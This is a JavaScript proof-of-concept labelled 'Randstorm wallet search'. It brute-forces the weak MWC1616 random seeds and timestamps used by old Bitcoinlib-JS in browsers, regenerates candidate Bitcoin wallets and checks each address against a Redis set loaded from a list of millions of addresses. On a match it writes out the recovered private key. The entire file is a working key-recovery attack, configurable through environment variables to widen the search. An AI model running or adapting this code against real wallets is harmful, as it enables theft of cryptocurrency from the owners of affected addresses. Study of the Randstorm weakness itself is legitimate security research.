import './crypto-js/crypto.mjs'
import './crypto-js/sha256.mjs'
import './crypto-js/ripemd160.mjs'

import './bitcoin.mjs'
import './address.mjs'

import './jsbn.mjs'
import './jsbn2.mjs'
import './base58.mjs'

import './util.mjs'
import './sec.mjs'
import './rng.mjs'
import './eckey.mjs'

import { createClient } from 'redis';
import readline from 'readline'
import fs from 'fs'
import process from 'process'
import cluster from 'cluster'

/**
 * --- PoC: Randstorm wallet search ---
 *
 * A wallet generated by Bitcoinlib-JS on a vulnerable browser is fully
 * determined by:
 *   - state0, state1   : the two 32-bit MWC1616 seeds at page load
 *   - tConstruct       : Date.now() captured inside SecureRandom's constructor
 *   - tFirstByte       : Date.now() captured on the first nextBytes() call
 *
 * `tConstruct` and `tFirstByte` are within a few ms of each other and within
 * the wallet's known-creation window, so the realistic search space is
 * roughly:  2^32 (state0) * 2^32 (state1) * (window in ms)
 *
 * This PoC iterates that triple deterministically. Each iteration regenerates
 * the wallet from scratch, derives the uncompressed P2PKH address (default in
 * Bitcoinlib-JS at the time), and queries Redis for a hit.
 */

const REDIS_URL = process.env.REDIS_URL || 'redis://default:1234@127.0.0.1:6379';
const LOAD = false;

let client = null;
try {
    client = createClient({ url: REDIS_URL });
    await client.connect();
    console.log('[START] Connected to Redis');
} catch (e) {
    console.error(e);
}

if (LOAD === true) {
    try {
        await client.flushDb();
        const readInterface = readline.createInterface({
            input: fs.createReadStream('btah.txt'),
            console: false
        });
        let i = 1;
        const wallets = [];
        readInterface.on('line', function (line) {
            if (!line.startsWith('1') || i > 22685755) {
                readInterface.close();
                return;
            }
            wallets.push(line);
            i++;
        });
        readInterface.on('close', async () => {
            let x = wallets.length - 1;
            while (x--) {
                await client.set(wallets[x], '1');
                delete wallets[x];
                if ((x & 0xFFFF) === 0) console.log('Loading >', x);
            }
            console.log('Load Finished.');
            process.exit(0);
        });
    } catch (e) {
        console.log(e);
    }
}

// --- Search-space configuration -------------------------------------------
// The full space (2^64 * window) is intractable; this PoC sweeps a small
// demonstration slice. Override via env vars to widen the search.
const STATE0_BASE = parseInt(process.env.STATE0_BASE || '0xbfe166e7', 16) | 0;
const STATE1_BASE = parseInt(process.env.STATE1_BASE || '0x64d1c3c9', 16) | 0;
const TIME_BASE   = parseInt(process.env.TIME_BASE   || '1305044095468', 10);
const TIME_WINDOW = parseInt(process.env.TIME_WINDOW || '86400000', 10); // 1 day
const STATE_SPAN  = parseInt(process.env.STATE_SPAN  || '1024', 10);
const TOTAL_ITERS = parseInt(process.env.TOTAL_ITERS || '30000000', 10);

function candidateSeed(i, workerIdx, workerCount) {
    // Stride the time axis across workers so they don't collide.
    const tOffset = ((i * workerCount) + workerIdx) % TIME_WINDOW;
    const sOffset = Math.floor(((i * workerCount) + workerIdx) / TIME_WINDOW) % STATE_SPAN;
    const t = TIME_BASE + tOffset;
    return {
        state0: (STATE0_BASE + sOffset) | 0,
        state1: (STATE1_BASE + sOffset) | 0,
        tConstruct: t,
        tFirstByte: t // assume same-ms first byte; widen to ±N for higher recall
    };
}

async function checkAddress(address) {
    if (!client) return null;
    return client.get(address);
}

if (cluster.isPrimary) {
    const N = parseInt(process.env.WORKERS || '4', 10);
    for (let w = 0; w < N; w++) {
        cluster.fork({ WORKER_IDX: String(w), WORKER_COUNT: String(N) });
    }
} else {
    const workerIdx = parseInt(process.env.WORKER_IDX || '0', 10);
    const workerCount = parseInt(process.env.WORKER_COUNT || '1', 10);
    const label = 'test' + process.pid;
    console.time(label);

    for (let i = 0; i < TOTAL_ITERS; i++) {
        const seed = candidateSeed(i, workerIdx, workerCount);
        const btc = new Bitcoin.ECKey(seed); // uncompressed by default
        const addr = btc.getBitcoinAddress().toString();

        if ((i & 0x3FF) === 0) {
            console.log('Worker', process.pid,
                'i=', i,
                'state=(', seed.state0.toString(16), ',', seed.state1.toString(16), ')',
                't=', seed.tConstruct,
                'addr=', addr);
        }

        const hit = await checkAddress(addr);
        if (hit != null) {
            const out = `PV:    ${btc.getExportedPrivateKey()}
PVHEX: ${btc.toString()}
Addr:  ${addr}
Seed:  state0=0x${(seed.state0>>>0).toString(16)} state1=0x${(seed.state1>>>0).toString(16)} t=${seed.tConstruct}
`;
            console.log('>>> Found', out);
            fs.writeFileSync(`./hit-${process.pid}.txt`, out);
            break;
        }
    }
    console.timeEnd(label);
    process.exit(0);
}
